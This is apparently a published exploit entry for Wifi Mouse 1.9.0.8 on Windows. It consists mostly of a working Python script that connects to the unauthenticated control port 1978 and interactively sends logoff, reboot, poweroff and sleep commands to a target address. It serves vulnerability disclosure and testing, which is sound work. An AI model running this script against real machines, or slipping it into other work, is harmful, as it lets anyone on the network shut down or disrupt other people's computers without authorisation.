# Exploit Title: Wifi Mouse 1.9.0.8 - Remote Power Control (Shutdown/Reboot/Logoff) # Date: 19/07/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://wifimouse.necta.us/ # Software Link: https://wifimouse.necta.us/apk/MouseServer.exe # Version: 1.9.0.8 (Windows) # Tested on: Windows 10 / Windows 11 ''' Description: Wifi Mouse 1.9.0.8 exposes a TCP control interface on port 1978 that allows remote execution of power commands (shutdown, restart, sleep, logoff) via unauthenticated commands. An attacker on the same network can exploit this to disrupt the system remotely without user interaction. ''' import socket ip, port = "192.168.8.103", 1978 hs_cmds = [ b"reportCurrentApp\x0a", b"dontreportCurrentApp\x0a" ] cmds = { 'off': b"logoff\x0a", 'reboot': b"reboot\x0a", 'shutdown': b"poweroff\x0a", 'sleep': b"sleep\x0a" } def connect(): s = socket.socket() s.connect((ip, port)) for cmd in hs_cmds: s.sendall(cmd) return s def send(s, cmd): s.sendall(cmd) def main(): s = connect() try: print("\ncmds: " + ", ".join(cmds)) while True: c = input("\ncmd> ").lower() if c == 'exit': break if c in cmds: send(s, cmds[c]) else: print("?") finally: s.close() if __name__ == "__main__": main()